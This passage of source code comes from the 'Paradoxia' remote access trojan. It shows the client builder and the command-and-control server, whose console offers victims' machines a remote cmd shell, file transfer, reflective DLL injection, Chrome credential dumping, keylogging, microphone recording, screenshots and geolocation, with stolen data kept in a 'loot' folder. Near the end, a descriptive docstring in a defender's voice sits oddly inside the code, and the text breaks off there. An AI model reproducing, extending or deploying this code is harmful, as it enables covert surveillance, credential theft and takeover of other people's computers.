/ 35 | `.___,' `.__,' `.__,' 36 | """ + Style.RESET_ALL 37 | 38 | bannerthree = Style.BRIGHT + Fore.BLUE + r""" 39 | 40 | |,---"-----------------------------"---,| 41 | ||paradoxia> cat loot/xx/tasklist || 42 | ||Image Name || 43 | ||========================== || 44 | ||System || 45 | ||chrome.exe || 46 | ||winsvchost.exe || 47 | || || 48 | ||_____,_________________________,_____|| 49 | |)_____)-----.| -------- |.------(_____(| 50 | //''''''|_____|=----------=|______|'''''''\\ 51 | // _| _| _| _| _| _| _| _| _| _| _| _| _| _| \ 52 | // ___| _| _| _| _| _| _| _| _| _| _| _| | | \ 53 | |/ ___| _| _| _| _| _| _| _| _| _| _| _| ______| \ 54 | / __| _| _| _| _| _| _| _| _| _| _| _| _| _| ___| \ 55 | / _| _| _| _| ________________________| _| _| _| _| \ 56 | |----------------------------------------------------| 57 | `-----------------------------------------------------' 58 | """ + Style.RESET_ALL 59 | 60 | 61 | bannerfour = Style.BRIGHT + Fore.RED + r""" 62 | 63 | _--_ 64 | / -) 65 | ___/___|___ 66 | ____-----=~~///| ||||~~~==-----_____ 67 | //~////////////~/| |//|||||\\\\\\\\\\\\\ 68 | ////////////////////| |///////|\\\\\\\\\\\\\\\ 69 | /////~~~~~~~~~~~~~~~\ |.||/~~~~~~~~~~~~~~~~~`\\\\\ 70 | //~ /\\|\\ ~\\ 71 | ///W^\W\ 72 | ////|||\\\ 73 | ~~~~~~~~~~ 74 | Injustice anywhere is a threat to Justice everywhere. 75 | 76 | """ + Style.RESET_ALL 77 | bannerfive = Style.BRIGHT + Fore.LIGHTGREEN_EX + r''' 78 | 79 | .o oOOOOOOOo OOOo 80 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO 81 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO 82 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' 83 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo 84 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO 85 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO 86 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo. 87 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO 88 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO 89 | "OOOO" "YOoOOOOMOIONODOO"` . 
'"OOROAOPOEOOOoOY" "OOO" 90 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` 91 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . 92 | . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo 93 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': 94 | `$" `OOOO' `O"Y ' `OOOO' o . 95 | . . OP" : o . 96 | : 97 | . 98 | A Devil is at his strongest when we are looking the other way, 99 | like a program running in the background silently, while we are busy doing 100 | other shit. 101 | ''' + Style.RESET_ALL 102 | def pbanner(): 103 | return random.choice([banner, bannertwo, bannerthree, bannerfour, bannerfive]) 104 | -------------------------------------------------------------------------------- /kernel/builder.py: -------------------------------------------------------------------------------- 1 | """ 2 | 3 | Generate Client 4 | 5 | """ 6 | import os 7 | import subprocess 8 | import os 9 | import subprocess 10 | 11 | 12 | def inplace_change(filename, old_string, new_string): 13 | # Safely read the input filename using 'with' 14 | try: 15 | with open(filename) as f: 16 | s = f.read() 17 | if old_string not in s: 18 | #print('"{old_string}" not found in (unknown).'.format(**locals())) 19 | return 20 | 21 | # Safely write the changed content, if found in the file 22 | with open(filename, 'w') as f: 23 | #print('Changing "{old_string}" to "{new_string}" in (unknown)'.format(**locals())) 24 | s = s.replace(old_string, new_string) 25 | f.write(s) 26 | except FileNotFoundError: 27 | print("[x] File not found : " + filename) 28 | except Exception as e: 29 | print("[X] Error : " + str(e)) 30 | 31 | 32 | def Build(host, port, icon, outfile, install_name, install_dir): 33 | try: 34 | os.chdir("ParadoxiaClient/ParadoxiaClient") 35 | 36 | inplace_change("ParadoxiaClient.c", "{{serverhost}}", host) 37 | inplace_change("ParadoxiaClient.c", "{{serverport}}", port) 38 | inplace_change("paradoxia.h", "{{installname}}", install_name.strip()) 39 | inplace_change("paradoxia.h", "{{installdir}}", install_dir.strip()) 40 | 
inplace_change("makefile", "{{outfilehere}}", outfile) 41 | if(icon is not None): 42 | if(os.path.isfile(icon)): 43 | inplace_change("icon.rc", "{{iconhere}}", icon) 44 | subprocess.call(["make", "icon"], stderr=subprocess.STDOUT, stdout = subprocess.DEVNULL) 45 | 46 | else: 47 | print("[X] Icon not found : " + icon) 48 | else: 49 | subprocess.call(["make"], stderr=subprocess.STDOUT, stdout = subprocess.DEVNULL) 50 | 51 | 52 | if(os.path.isfile(outfile)): 53 | print("[+] Built : {x}".format(x = os.path.abspath(outfile))) 54 | else: 55 | print("[X] Error building Paradoxia Client.") 56 | 57 | except Exception as e: 58 | print("[x] Error : " + str(e)) 59 | 60 | inplace_change("ParadoxiaClient.c", host, "{{serverhost}}") 61 | inplace_change("ParadoxiaClient.c", port, "{{serverport}}") 62 | if(icon is not None): 63 | inplace_change("icon.rc",icon, "{{iconhere}}") 64 | inplace_change("makefile", outfile, "{{outfilehere}}") 65 | inplace_change("paradoxia.h", install_name.strip(), "{{installname}}") 66 | inplace_change("paradoxia.h", install_dir.strip(), "{{installdir}}") 67 | os.chdir("..") 68 | os.chdir("..") -------------------------------------------------------------------------------- /kernel/main.py: -------------------------------------------------------------------------------- 1 | """ 2 | Core file for Paradoxia V.2 3 | Most of the code has been taken from the Maalik Framework and merged into old and bad code of paradoxia. 4 | 5 | => https://github.com/quantumcored/maalik 6 | """ 7 | 8 | """ 9 | 10 | Have a good time reading the source. You are an amazing person. 
11 | 12 | """ 13 | import socket 14 | import _thread 15 | import configparser 16 | from os import stat 17 | from os import path 18 | from .builder import Build 19 | import os 20 | import subprocess 21 | from kernel.banner import pbanner 22 | from .other import * 23 | from colorama import Fore, Style 24 | import colorama 25 | from .scanner import * 26 | import tqdm 27 | import time 28 | from prompt_toolkit import prompt 29 | import sys 30 | 31 | colorama.init() 32 | 33 | clients = [] # List of client sockets 34 | oslist = [] # List of client Operating systems 35 | iplist = [] # List of Client IP addresses 36 | wan_ip_list = [] # List of Client Wan IP's 37 | blacklist = [] # List of blacklisted ip 38 | log = [] # logging messages from client 39 | hostList = [] 40 | 41 | ClientInfoList = [] 42 | 43 | isSession = False 44 | silent = False 45 | shellmode = False # ( ͡° ͜ʖ ͡°) 46 | 47 | # Do not change this 48 | DLL_OUTPUT_FILE = "proxima_centauri.txt" 49 | 50 | infodb = configparser.ConfigParser() 51 | settings = configparser.ConfigParser() 52 | 53 | 54 | try: 55 | settings.read("paradoxia.ini") 56 | server_settings = settings['server'] 57 | bot_settings = settings['bot'] 58 | except Exception as e: 59 | print(str(e)) 60 | exit(True) 61 | 62 | 63 | def broadcast(data): 64 | try: 65 | for i in clients: 66 | i.send(data.encode()) 67 | except Exception as error: 68 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(error)) 69 | 70 | 71 | class ParadoxiaClient: 72 | def __init__(self, client_socket): 73 | self.client_socket = client_socket 74 | 75 | global clients 76 | global oslist 77 | global iplist 78 | global wan_ip_list 79 | global blacklist 80 | 81 | client_information = [] 82 | 83 | def Log(self, data): 84 | del log[:] 85 | log.append(data) 86 | 87 | 88 | def botlist(self): 89 | return str(len(clients)) 90 | 91 | def SendData(self, data): 92 | try: 93 | self.client_socket.send(data.encode()) 94 | except Exception as error: 95 | 
self._clearKick() 96 | print("Error Occured : " + str(error)) 97 | 98 | def SendBytes(self, data): 99 | try: 100 | self.client_socket.send(data) 101 | except Exception as error: 102 | self._clearKick() 103 | print("Error Occured : " + str(error)) 104 | 105 | 106 | def returnClientName(self): 107 | index = clients.index(self.client_socket) 108 | return wan_ip_list[index] + " - " + oslist[index] 109 | 110 | def _clearKick(self): 111 | ''' 112 | clear lists and kick 113 | ''' 114 | global isSession 115 | global clients 116 | try: 117 | if(isSession): 118 | print( Style.BRIGHT + Fore.RED + "[ Session Closed ] " + Style.RESET_ALL + self.returnClientName()) 119 | isSession = False 120 | location = clients.index(self.client_socket) 121 | clients.remove(clients[location]) 122 | iplist.remove(iplist[location]) 123 | oslist.remove(oslist[location]) 124 | wan_ip_list.remove(wan_ip_list[location]) 125 | ClientInfoList.remove(ClientInfoList[location]) 126 | except Exception as unkown_error: 127 | print(Style.BRIGHT + Fore.RED + "[x]" + Style.RESET_ALL + " Error : " + str(unkown_error)) 128 | 129 | def clearLog(self): 130 | del log[:] 131 | 132 | def WaitForReply(self): 133 | """ 134 | Wait 20 seconds for Message from Client 135 | """ 136 | self.clearLog() # Clear log list 137 | x = 0 # x is 0 138 | while(x != 20): # while x is not 20 139 | try: 140 | if(len(log) > 0): # If length of log is greater than 0, means message received. So break the loop 141 | break # break here 142 | time.sleep(0.5) # Sleep 0.5 second 143 | x += 1 # Add one to x 144 | if(x == 20): 145 | print( Style.BRIGHT + Fore.RED + "[i]" + Style.RESET_ALL + " 20 seconds have passed and we have received no response from Paradoxia. There may be a problem.") 146 | except KeyboardInterrupt: 147 | break # Keyboard interrupt, Breaks the loop. 
148 | 149 | 150 | def returnWanIP(self): 151 | ip_index = clients.index(self.client_socket) 152 | wanip = wan_ip_list[ip_index] 153 | 154 | if(wanip.startswith("No")): 155 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Unable to get Wan IP, No internet access detected.") 156 | geolocation_information = "[No Internet Access]" 157 | else: 158 | return wan_ip_list[ip_index] 159 | 160 | def returnOS(self): 161 | ip_index = clients.index(self.client_socket) 162 | return oslist[ip_index] 163 | 164 | def getClientInformation(self): 165 | wanip = self.returnWanIP() 166 | os = self.returnOS() 167 | # print(os) 168 | self.SendData("ramsize") 169 | ram = self.client_socket.recv(1024).decode() 170 | # print(ram) 171 | self.SendData("vramsize") 172 | vram = self.client_socket.recv(1024).decode() 173 | # print(vram) 174 | self.SendData("pagesize") 175 | pagesize = self.client_socket.recv(1024).decode() 176 | # print(pagesize) 177 | self.SendData("processors") 178 | processors = self.client_socket.recv(1024).decode() 179 | # print(processors) 180 | self.SendData("minappaddr") 181 | minappaddr = self.client_socket.recv(1024).decode() 182 | # print(minappaddr) 183 | self.SendData("maxappaddr") 184 | maxappaddr = self.client_socket.recv(1024).decode() 185 | # print(maxappaddr) 186 | self.SendData("agent") 187 | agent_location = self.client_socket.recv(1024).decode() 188 | # print(agent_location) 189 | self.SendData("host") 190 | user_pc = self.client_socket.recv(1024).decode() 191 | # print(user_pc) 192 | 193 | 194 | return """ 195 | [+] Operating System : {os} 196 | [+] Ram : {ram} 197 | [+] VirtualRam : {vram} 198 | [+] MinimumApplicationAddress : {minappaddr} 199 | [+] MaximumApplicationAddress : {maxappaddr} 200 | [+] PageSize : {pagesize} 201 | [+] Processors : {processors} 202 | [+] Agent-Location : {agent_location} 203 | [+] User-PC : {userpc} 204 | [+] WAN : {wanip} 205 | """.format( 206 | os = os, 207 | ram = ram, 208 | vram = vram, 209 | 
minappaddr = minappaddr, 210 | maxappaddr = maxappaddr, 211 | pagesize = pagesize, 212 | processors = processors, 213 | agent_location = agent_location, 214 | userpc = user_pc, 215 | wanip = wanip, 216 | ) 217 | 218 | 219 | 220 | def Session(self): 221 | 222 | global isSession 223 | global shellmode 224 | global silent 225 | 226 | def filetransfer(mfile = None, rfile=None): 227 | if(mfile == None and rfile == None): 228 | mfile = prompt("[+] File Path : ") 229 | rfile = prompt("[+] File name to Save as : ") 230 | 231 | if(":" in rfile): 232 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] ':' is forbidden in filename.") 233 | else: 234 | try: 235 | with open(mfile, "rb") as sendfile: 236 | data = sendfile.read() 237 | bufferst = os.stat(mfile) 238 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] File opened " + mfile + " ("+str(bufferst.st_size) + " bytes)" ) 239 | 240 | self.SendData("frecv") # Send File Receive trigger for client 241 | trigger = rfile + ":" + str(bufferst.st_size) 242 | time.sleep(1) 243 | self.SendData(trigger) # Send Trigger 244 | self.SendBytes(data) # Send file 245 | print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Uploading file.") 246 | self.WaitForReply() 247 | except FileNotFoundError: 248 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] '{file}' not found!?".format(file = mfile)) 249 | except Exception as e: 250 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error : " + str(e)) 251 | 252 | def DLLTransfer(mfile=None): 253 | if(mfile == None): 254 | mfile = prompt("[+] DLL Path : ") 255 | proc = prompt("[+] Process Name : ") 256 | else: 257 | proc = "None" 258 | try: 259 | with open(mfile, "rb") as sendfile: 260 | data = sendfile.read() 261 | bufferst = os.stat(mfile) 262 | #print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] File opened " + mfile + " ("+str(bufferst.st_size) + " bytes)" ) 263 | 264 | 
self.SendData("fdll") # Send File Receive trigger for client 265 | time.sleep(1) 266 | trigger = "paradoxia" + ":" + str(bufferst.st_size) + ":" + proc 267 | self.SendData(trigger) # Send Trigger 268 | self.SendBytes(data) # Send file 269 | #print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Uploading file.") 270 | self.WaitForReply() 271 | except FileNotFoundError: 272 | print("[X] '{file}' not found!?".format(file = mfile)) 273 | except Exception as e: 274 | print("[X] Error : " + str(e)) 275 | 276 | isSession = True 277 | while(isSession): 278 | try: 279 | try: 280 | location = clients.index(self.client_socket) 281 | if not shellmode: 282 | shellmode = True 283 | 284 | except ValueError: 285 | print("[X] Client disconnected unexpectedly, Session closed.") 286 | shellmode = False 287 | session = False 288 | break 289 | ip = iplist[location] 290 | main = prompt("paradoxia >> ({ip}) : ".format(ip = ip)) 291 | if(main == "ls"): 292 | 293 | self.SendData("listdir") 294 | self.WaitForReply() 295 | 296 | 297 | elif(main.startswith("dir")): 298 | sp = main.split() 299 | try: 300 | self.SendData("cd") 301 | self.SendData(sp[1]) 302 | self.WaitForReply() 303 | except IndexError: 304 | print(Style.BRIGHT + Fore.RED + "[X] Error : Usage is dir < dir > ") 305 | elif(main == "poweroff"): 306 | self.SendData("cmd.exe /c shutdown /s /t 0") 307 | self.WaitForReply() 308 | elif(main == "reboot"): 309 | self.SendData("cmd.exe /c shutdown /r /t 0") 310 | self.WaitForReply() 311 | elif(main == "shell"): 312 | shell = True 313 | 314 | while (shell): 315 | sh = prompt("cmd> ") 316 | if(len(sh) > 0): 317 | if(sh != "exit"): 318 | self.SendData("cmd.exe /c "+ sh) 319 | self.WaitForReply() 320 | else: 321 | shell = False 322 | break 323 | 324 | elif(main == "exit"): 325 | shellmode = False 326 | session = False 327 | break 328 | 329 | elif(main == "delete"): 330 | dlt = prompt("[:] Enter Filename to Delete : ") 331 | if(len(dlt) > 0): 332 | 
self.SendData("delete:"+dlt) 333 | self.WaitForReply() 334 | 335 | elif ( main == "clientinfo"): 336 | self.SendData("clientinfo") 337 | 338 | elif(main == "upload"): 339 | filetransfer() 340 | time.sleep(2) 341 | 342 | elif(main == "download"): 343 | filename = prompt("[+] File : ") 344 | if(len(filename) > 0): 345 | self.SendData("fupload:"+filename) 346 | self.WaitForReply() 347 | time.sleep(5) 348 | 349 | elif(main == "processinfo"): 350 | name = prompt("[+] Enter Process name : ") 351 | if(len(name) > 0): 352 | self.SendData("psinfo:"+name) 353 | self.WaitForReply() 354 | 355 | elif(main == "admin"): 356 | self.SendData("isadmin") 357 | self.WaitForReply() 358 | 359 | elif(main == "geolocate"): 360 | GeoLocate(self.returnWanIP()) 361 | elif(main == "dllinject"): 362 | DLLTransfer() 363 | 364 | elif(main == "drives"): 365 | self.SendData("cmd.exe /c fsutil fsinfo drives") 366 | self.WaitForReply() 367 | 368 | elif(main == "help"): 369 | print(session_help) 370 | 371 | elif (main == "kill"): 372 | self.SendData("kill") 373 | self.client_socket.shutdown(socket.SHUT_RDWR) 374 | self.client_socket.close() 375 | shellmode = False 376 | session = False 377 | break 378 | 379 | elif(main == "die"): 380 | self.SendData("die") 381 | self.WaitForReply() 382 | self.client_socket.shutdown(socket.SHUT_RDWR) 383 | self.client_socket.close() 384 | shellmode = False 385 | session = False 386 | break 387 | elif(main == "screenshot"): 388 | self.SendData("screenshot") 389 | self.WaitForReply() 390 | 391 | elif(main == "chromedump"): 392 | DLLTransfer("dlls/chrome.dll") # Inject ChromeDump.dll 393 | time.sleep(2) 394 | credfile = hostList[location].split("/")[0].strip() 395 | self.SendData("fupload:"+credfile) 396 | time.sleep(2) 397 | self.SendData("delete:"+credfile) 398 | self.WaitForReply() 399 | print("-------------------------") 400 | PrintTextFile("loot/"+credfile) 401 | print("-------------------------") 402 | print(Style.BRIGHT + Fore.LIGHTWHITE_EX + "[+] Saved in 
'downloads/"+credfile+"'") 403 | 404 | elif(main == "keylog_start"): 405 | DLLTransfer("dlls/keylogger.dll") 406 | 407 | elif(main == "keylog_dump"): 408 | self.SendData("fupload:log.log") 409 | self.WaitForReply() 410 | time.sleep(2) 411 | self.SendData("delete:log.log") 412 | self.WaitForReply() 413 | print("-------------------------") 414 | PrintTextFile("loot/log.log") 415 | print("-------------------------") 416 | try: 417 | os.remove("loot/log.log") 418 | except FileNotFoundError: 419 | print("[X] No Logs were written.") 420 | 421 | elif(main == "info"): 422 | index = clients.index(self.client_socket) 423 | print(ClientInfoList[index]) 424 | 425 | elif(main == "micrecord"): 426 | saveFile = input("[+] Enter filename to save as : ") 427 | if(len(saveFile) > 0): 428 | self.SendData("micstart") 429 | self.WaitForReply() 430 | while(True): 431 | try: 432 | print("[+] Press CTRL+C to stop.") 433 | prompt("") 434 | except KeyboardInterrupt: 435 | self.SendData("micstop:"+saveFile) 436 | break 437 | time.sleep(2) 438 | self.SendData("fupload:"+saveFile) 439 | self.WaitForReply() 440 | time.sleep(2) 441 | self.SendData("delete:"+saveFile) 442 | 443 | except KeyboardInterrupt: 444 | print("[X] Interrupt, Type exit to Exit session.") 445 | 446 | 447 | def ClientThread(self): 448 | 449 | """ 450 | Receive data from client 451 | """ 452 | global silent 453 | global shellmode 454 | 455 | def uniquify(path): 456 | """ 457 | Credits : https://stackoverflow.com/questions/13852700/create-file-but-if-name-exists-add-number/57896232#57896232 458 | """ 459 | filename, extension = os.path.splitext(path) 460 | counter = 1 461 | 462 | while os.path.exists(path): 463 | path = filename + " (" + str(counter) + ")" + extension 464 | counter += 1 465 | 466 | return path 467 | 468 | while(True): 469 | try: 470 | client_data = self.client_socket.recv(1024).decode() 471 | 472 | if(not client_data): 473 | self._clearKick() 474 | break 475 | 476 | self.Log(client_data) 477 | 478 | try: 479 | 
indexof = clients.index(self.client_socket) 480 | ips = iplist[indexof] 481 | except Exception as e: 482 | print("[X] Error : " + str(e)) 483 | pass 484 | 485 | # Paradoxia reporting an Open Port on a Host 486 | if(client_data.startswith("OPENPORT")): 487 | # OPENPORT:IP,Port 488 | parse = client_data.split(":") 489 | ip_port = str(parse[1]).split(",") 490 | with open("common_ports", "r") as portlist: 491 | lines = portlist.readlines() 492 | for line in lines: 493 | if(ip_port[1] in line): 494 | # if port in list 495 | ipport = ip_port[0] + ":" + ip_port[1] 496 | print("["+ Style.BRIGHT + Fore.GREEN + "+" + Style.RESET_ALL + "] " + ipport + Style.BRIGHT + Fore.GREEN + " <--> " + Style.RESET_ALL + line ) 497 | if(ipport not in self.open_ports_list): 498 | self.open_ports_list.append(ipport) 499 | break 500 | 501 | 502 | # Paradoxia wants to send us a file 503 | elif(client_data.startswith("FILE")): 504 | try: 505 | fileinfo = client_data.split(":") #FILE:filename.txt:555 506 | #print(fileinfo) 507 | filename = fileinfo[1] 508 | filesize = int(fileinfo[2]) 509 | SaveFile = "loot/"+ filename 510 | FinalF = uniquify(SaveFile) 511 | 512 | with open(FinalF, "wb") as incoming_file: 513 | data = self.client_socket.recv(4096) 514 | 515 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloading file '{fl}' in '{fd}'".format(fl=filename, fd=FinalF)) 516 | while(len(data) != filesize): 517 | data += self.client_socket.recv(filesize - len(data)) 518 | #print("data = " + str(len(data)) + " filesize = " + str(filesize)) 519 | if not data: break 520 | incoming_file.write(data) 521 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloaded '{fl}' => '{fd}'".format(fl=filename, fd=FinalF)) 522 | 523 | except Exception as e: 524 | print("[X] Error : " + str(e)) 525 | print("[i] File Download Information : " + client_data) 526 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 
527 | print("[i] Please report this bug to developer with the information above.") 528 | pass 529 | 530 | # Get Process information 531 | elif(client_data.startswith("PROCESS")): 532 | try: 533 | fileinfo = client_data.split(",") # split info by comma 534 | print( 535 | Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Process '{p}' running at PID '{pid}' Path on disk '{pth}' ..." 536 | .format(p = fileinfo[1], pid = fileinfo[2], pth = fileinfo[3])) 537 | 538 | except Exception as Error: 539 | print("[X] Error : " + str(Error)) 540 | print("[i] Process Information : " + client_data) 541 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 542 | print("[i] Please report this bug to developer with the information above.") 543 | pass 544 | 545 | elif(client_data.startswith("PID")): 546 | try: 547 | fileinfo = client_data.split(":") # split info by comma 548 | self.SendData("psinfo:"+fileinfo[1]) 549 | 550 | except Exception as Error: 551 | print("[X] Error : " + str(Error)) 552 | print("[i] Process Information : " + client_data) 553 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 554 | print("[i] Please report this bug to developer with the information above.") 555 | pass 556 | elif(client_data.startswith("ADMIN")): 557 | try: 558 | fileinfo = client_data.split(":") 559 | 560 | if(fileinfo[1] == "TRUE"): 561 | elevated = True 562 | else: 563 | elevated = False 564 | 565 | if(not silent): 566 | print( 567 | Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Administrator : " + fileinfo[1].lower()) 568 | 569 | 570 | except Exception as Error: 571 | print("[X] Error : " + str(Error)) 572 | print("[i] Process Information : " + client_data) 573 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 
574 | print("[i] Please report this bug to developer with the information above.") 575 | pass 576 | 577 | # Get screenshot, Convert to png and save 578 | elif(client_data.startswith("SCREENSHOT")): 579 | try: 580 | fileinfo = client_data.split(":") #SCREENSHOT:filename.txt:555 581 | # print(fileinfo) 582 | filename = fileinfo[1] 583 | filesize = int(fileinfo[2]) 584 | SaveFile = "loot/"+ filename 585 | FinalF = uniquify(SaveFile).replace("bmp", "png") 586 | 587 | time.sleep(1) 588 | with open(FinalF, "wb") as incoming_file: 589 | data = self.client_socket.recv(4096) 590 | #print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Downloading file '{fl}' in '{fd}'".format(fl=filename, fd=FinalF)) 591 | while(len(data) != filesize): 592 | data += self.client_socket.recv(filesize - len(data)) 593 | #print("data = " + str(len(data)) + " filesize = " + str(filesize)) 594 | if not data: break 595 | incoming_file.write(data) 596 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Screenshot saved to '{fl}'".format(fl=FinalF)) 597 | saveAndShowImage(FinalF) 598 | 599 | except Exception as e: 600 | print("[X] Error : " + str(e)) 601 | print("[i] Screenshot Download Information : " + client_data) 602 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 603 | print("[i] Please report this bug to developer with the information above.") 604 | pass 605 | 606 | # File was recevied by Paradoxia 607 | elif(client_data.startswith("F_OK")): 608 | try: 609 | fileinfo = client_data.split(",") # split info by comma 610 | print( 611 | Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Uploaded (unknown) ({filesize} bytes) to '{remote_path}' ..." 
612 | .format(filename = fileinfo[1], filesize = fileinfo[2], remote_path = fileinfo[3])) 613 | 614 | except Exception as Error: 615 | print("[X] Error : " + str(Error)) 616 | print("[i] File Received Information : " + client_data) 617 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 618 | print("[i] Please report this bug to developer with the information above.") 619 | pass 620 | 621 | # Reflective DLL Injection was successfully done 622 | elif(client_data.startswith("DLL_OK")): 623 | try: 624 | fileinfo = client_data.split(":") 625 | print(Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] Injected Reflective DLL into PID " + fileinfo[1] + " ...") 626 | 627 | except Exception as Error: 628 | print("[X] Error : " + str(Error)) 629 | print("[i] Reflective DLL Inject Information : " + client_data) 630 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 631 | print("[i] Please report this bug to developer with the information above.") 632 | pass 633 | 634 | # Get Wanip, geolocate 635 | 636 | elif(client_data.startswith("WANIP")): 637 | try: 638 | fileinfo = client_data.split(":") 639 | print(Style.BRIGHT + "[" + Fore.GREEN + "+" + Style.RESET_ALL + Style.BRIGHT + "] WAN IP : " + fileinfo[1] + " ...") 640 | GeoLocate(fileinfo[1]) 641 | except Exception as Error: 642 | print("[X] Error : " + str(Error)) 643 | print("[i] Geolocation Information : " + client_data) 644 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 645 | print("[i] Please report this bug to developer with the information above.") 646 | pass 647 | elif(client_data.startswith("DEL_OK")): 648 | try: 649 | fileinfo = client_data.split(",") 650 | print( "[" + Fore.LIGHTGREEN_EX + Style.BRIGHT + "i" + Style.RESET_ALL + "] File '{file}' deleted from '{pth}' ..." 
.format(file = fileinfo[1], pth = fileinfo[2] )) 651 | 652 | except Exception as Error: 653 | print("[X] Error : " + str(Error)) 654 | print("[i] File Delete Information : " + client_data) 655 | # Rare case, This will only happen if Paradoxia has sent invalid triggers. 656 | print("[i] Please report this bug to developer with the information above.") 657 | pass 658 | elif(shellmode == True): 659 | print("\n"+client_data) # No other information 660 | 661 | elif(silent == False): 662 | print("\n["+ Style.BRIGHT + Fore.GREEN + "+" + Style.RESET_ALL + "] {ips} : ".format(ips = ips) + client_data) 663 | 664 | except Exception as e: 665 | self._clearKick() 666 | print("[X] Error : " + str(e)) 667 | break 668 | except UnicodeDecodeError as ude: 669 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Decode error : " + str(ude)) 670 | except UnicodeEncodeError as eEe: 671 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Unicode Encode error : " + str(eEe)) 672 | except ConnectionAbortedError as cAe: 673 | self._clearKick() 674 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cAe)) 675 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 676 | break 677 | 678 | except ConnectionError as cE: 679 | self._clearKick() 680 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cE)) 681 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 682 | break 683 | 684 | except ConnectionRefusedError as cRe: 685 | self._clearKick() 686 | print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(cRe)) 687 | print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients))) 688 | break 689 | 690 | except ConnectionResetError as cRetwo: 691 | self._clearKick() 692 | print("["+Style.BRIGHT + Fore.RED + "X" + 
Style.RESET_ALL + "] Error Occured : " + str(cRetwo))
 693 |                 print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients)))
 694 |                 break
 695 | 
            # Tail of ClientThread's receive loop (the loop head is earlier in the file):
            # every socket-level error path below deregisters the peer via _clearKick()
            # and ends this receive thread with `break`.
 696 |             except socket.error as se:
 697 | 
 698 |                 self._clearKick()
 699 |                 print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(se))
 700 |                 print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients)))
 701 |                 break
 702 | 
 703 |             except Exception as recv_error:
 704 |                 self._clearKick()
 705 |                 print("["+Style.BRIGHT + Fore.RED + "X" + Style.RESET_ALL + "] Error Occured : " + str(recv_error))
 706 |                 print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Online : " + str(len(clients)))
 707 |                 break
 708 | 
 709 | def TCPServer():
    """
    Accept loop for the listener. Runs on a background thread started by Console().

    Binds a plain TCP socket to server_settings['host']:server_settings['port'] and,
    for each accepted peer, performs a three-step handshake: it sends the literal
    requests "host", "wanip" and "os" and reads one recv(1024) reply for each, then
    wraps the socket in a ParadoxiaClient and starts that object's ClientThread.
    No TLS wrapping appears anywhere in this listing, so those handshake strings
    travel in cleartext and are usable as on-the-wire observables (the shipped
    paradoxia.ini defaults the port to 443, which would place this non-TLS
    protocol on a TLS port).

    Side effects: appends to the module-level lists clients, iplist, hostList,
